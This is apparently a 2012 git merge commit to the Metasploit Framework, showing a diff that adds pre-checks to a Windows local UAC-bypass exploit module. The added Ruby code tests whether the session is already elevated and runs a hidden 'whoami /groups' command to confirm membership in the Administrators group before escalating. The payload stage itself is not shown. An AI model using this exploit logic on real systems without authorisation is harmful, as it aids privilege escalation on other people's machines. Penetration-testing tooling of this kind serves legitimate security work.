Merge branch 'bypassuac_admincheck' of git://github.com/mubix/metasploit-framework into mubix-bypassuac_admincheck

2012-11-16 11:29:09 -06:00 · 2012-11-16 11:29:09 -06:00 · 8375bb8390
parent 8930d618e3 e18acf2103
commit 8375bb8390
1 changed files with 30 additions and 0 deletions
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@ -50,6 +50,11 @@ class Metasploit3 < Msf::Exploit::Local

 	def exploit

+		isadmin = session.railgun.shell32.IsUserAnAdmin()
+		if isadmin['return']
+			print_error('Already in elevated state. Exiting...')
+			return
+		end

 		#
 		# Verify use against Vista+
@ -95,6 +100,31 @@ class Metasploit3 < Msf::Exploit::Local
 			return
 		end

+		# Check if you are an admin
+		print_status('Checking admin status...')
+		whoami = session.sys.process.execute('cmd /c whoami /groups', 
+			nil,
+			{'Hidden' => true, 'Channelized' => true}
+			)
+		cmdout = []
+		isinadmins = []
+		while(cmdoutput = whoami.channel.read)
+			cmdout << cmdoutput
+		end
+		if cmdout.size == 0
+			print_error('Either whoami is not there or failed to execute')
+			print_error('Continuing under assumption you already checked...')
+		else
+			isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)
+			if isinadmins.size > 0
+				print_good('Part of Administrators group! Continuing...')
+			else
+				print_error('Not in admins group, cannot escalate with this module')
+				print_error('Exiting...')
+				return
+			end
+		end
+
 		#
 		# Generate payload and random names for upload
 		#